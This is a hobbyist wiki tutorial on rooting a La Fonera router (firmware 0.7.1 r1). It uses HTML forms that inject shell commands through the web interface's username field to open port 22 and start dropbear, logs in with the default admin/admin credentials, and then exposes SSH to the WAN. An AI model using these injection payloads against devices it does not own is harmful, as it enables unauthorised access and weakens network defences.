====== Hacking La Fonera ======

This is the [[http://www.mariomix.net/mariomix-blog/2006/11/hacking-la-fonera-parte-3/|original article]] where I found this recipe.

This hack was tested on La Fonera with firmware **0.7.1 r1**. The web interface is vulnerable to a code injection, we will use it to open the internal firewall and to gain access to the TCP port 22 (ssh).

Suppose that La Fonera is reachable via Ethernet at the address **169.254.255.1**, we write two html forms on our PC and submit them using the browser. When La Fonera ask you to authenticate, use the default login/password: **admin** / **admin**. The first step will open the port 22 on the firewall:

<code html>
<html>
<head></head><body><center>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp --dport 22 -j ACCEPT)" size="68" />
<input type="submit" name="submit" value="Submit" />
</form>
</center></body></html>
</code>

The second step will start the ssh server **[[http://matt.ucc.asn.au/dropbear/dropbear.html|dropbear]]** (allow several seconds to let the program start):

<code html>
<html>
<head></head><body><center>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" ><input type="submit" name="submit" value="Submit" />
</form>
</center></body></html>
</code>

Now you can enter La Fonera via ssh with root/admin.

===== Mantain ssh access after reboot =====

To keep the ssh server running and the port 22 open after a reboot, do the following:

<code>
root@OpenWrt:/#mv /etc/init.d/dropbear /etc/init.d/S50dropbear
</code>

Edit **''/etc/firewall.user''** and decomment the following lines:

<file>
### Open port to WAN
## -- This allows port 22 to be answered by (dropbear on) the router
iptables -t nat -A prerouting_rule -i $WAN -p tcp --dport 22 -j ACCEPT
iptables        -A input_rule      -i $WAN -p tcp --dport 22 -j ACCEPT
</file>

Edit **''/bin/thinclient''** and comment-out the last line, where the downloaded script is executed. Add a line to save the script each time it is downloaded (remember to delete them periodically, to save space):

<file>
# . /tmp/.thinclient.sh
cp /tmp/.thinclient.sh /tmp/thinclient-$(date '+%H')
</file>